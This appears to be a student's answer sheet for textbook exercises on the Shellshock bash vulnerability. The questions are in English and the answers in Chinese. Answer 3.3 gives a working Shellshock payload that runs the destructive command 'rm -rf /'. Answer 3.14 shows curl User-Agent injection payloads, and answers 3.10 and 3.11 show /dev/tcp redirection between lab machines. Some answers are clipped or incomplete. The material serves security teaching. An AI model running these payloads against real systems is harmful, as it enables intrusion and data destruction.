3.1. When a shell variable containing a shell function definition is passed down to a child process as an environment variable, what is going to happen to the function definition?
在修复漏洞之前,子进程中将不存在该变量,但会有一个变量名为的函数,函数体将是该变量的值。
修复漏洞后,子shell将具有与父shell相同的变量。
3.2. Assume a Bash program defines a shell function, exports it, and then starts a child process that also runs Bash. Please explain how this function defined in the parent Bash becomes a function in the child Bash.
父shell创建进程时,会将每个导出的函数作为环境变量传递。当子进程运行bash(或者子进程本身是bash)时,它将解析环境变量并将其转换回函数。这是因为子进程获取父环境变量的副本。
3.3. Write a Bash function definition that tries to exploit the Shellshock vulnerability.
seed@ubuntu:~$ export foo='() { echo Hello World; }; rm -rf /'
seed@ubuntu:~$ bash
3.4. Instead of putting an extra shell command after a function definition, we put it at the beginning (see the following example). We then run Bash, which is vulnerable to the Shellshock attack. Will the shell command echo world be executed?
$ export foo=’echo world; () { echo hello;}’
$ bash
不。该漏洞仅在变量值以“(){”开头时存在。如果不是,则将其视为常规字符串,foo将作为子进程中的变量提供。
3.5. For the Shellshock vulnerability to be exploitable, two conditions need to be satisfied. What are these two conditions?
1.目标进程应该运行bash。
2.进程必须从外部获取一些环境变量,例如不受信任的用户。
3.6. How do user inputs get into a remote a CGI program (written in Bash) in the form of environment variables?
像Apache这样的web服务器将客户端头信息(如用户代理)作为环境变量传递给它们调用的CGI程序。例如,通过手动设置User-Agent字段,我们可以确保在远程计算机上有一个环境变量,该变量的值由我们选择。
3.7. Instead of using a function definition in the Shellshock attack against CGI programs, can we directly put shell commands inside the User-Agent field, so when Bash is triggered, the shell command can be executed?
不存在。bash漏洞的存在是因为它在环境变量的值的开头查找字符串“(){”,如果匹配,它会将其视为函数并继续对其进行解析。bash看起来不像函数定义,它将把它当作一个简单的字符串,而不运行命令。
3.8. Why was this mistake made? And what lesson did you learn from this mistake?
p47 错误的解析代码parse_and_execute() 造成了安全漏洞
3.9. There is another way to send inputs to a CGI program. That is to attach the input in the URL. See the following example.
http://www.example.com/myprog.cgi?name=value
Can we put our malicious function definition in the value field of the above URL, so when this value gets into the CGI program myprog.cgi, the Shellshock vulnerability can be exploited?
没有办法影响env
3.10. We run "nc -l 7070" on Machine 1 (IP address is 10.0.2.6), and we then type the following command on Machine 2. Describe what is going to happen?
$ /bin/cat < /dev/tcp/10.0.2.6/7070 >&0
nc-L7070将监听端口7070上的传入连接 所以机器1 会 在屏幕上显示机器2输入的任何内容
3.11. Please describe how you would do the following: run the /bin/cat program on Machine 1; the program takes its input from Machine 2, and print out its output to Machine 3.
Machine2:
$ nc -l 7070Machine3:
$ nc -l 7070Machine 1:
$ /bin/cat < /dev/tcp/Machine2/7070 > /dev/tcp/Machine3/7070
3.12. Consider the following program:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
extern char **environ;
int main()
{
char *args[] =
{
"/bin/sh", "-c",
"/bin/ls", NULL
};
pid_t pid = fork();
if(pid == 0) {
/* child */
printf("child\n");
execve(args[0], &args[0], NULL); À
}
else if(pid > 0) {
/* parent */
printf("parent\n");
}
return 0;
}
The program forks a child process, and executes the /bin/ls program using /bin/sh, which is a symbolic link to /bin/bash. The program is executed as the following. Explain what the output of the program will be and why.
$ gcc prog.c -o prog
$ export foo=’() { echo hello; }; echo world;’
$ ./prog
execve没有传入父进程的环境变量 所以没有打印 world
3.13. Let’s make a change to the code in Problem 3.12.. We change the code in Line À to the
following. Please redo Problem 3.12. with this change made.
execve(args[0], &args[0], environ);
foo环境变量传入了
3.14. Consider a PHP program running as Apache module, and a CGI program.
-----------------------------------
The PHP program (test.php):
<?php
system("/bin/ls -l")
?>
-----------------------------------
The CGI program (test.cgi):
#!/bin/sh
/bin/ls -l
Both programs invoke /bin/ls command in a new shell process (/bin/sh points to /bin/bash). If the programs are invoked as the following, please explain the difference in effect of the Shellshock vulnerability on these two cases. What conditions are necessary to exploit shellshock in either case?
$ curl -A "() { echo hello; }; echo world;"
http://localhost/test.php
$ curl -A "() { echo hello; }; echo world;"
http://localhost/test.cgi
p57 shell shock漏洞要求满足两个条件
- bash调用
- 传入用户数据作为环境变量
但再php脚本中并不总是能被满足 如果不用cgi 则apache无法通过环境变量传给php程序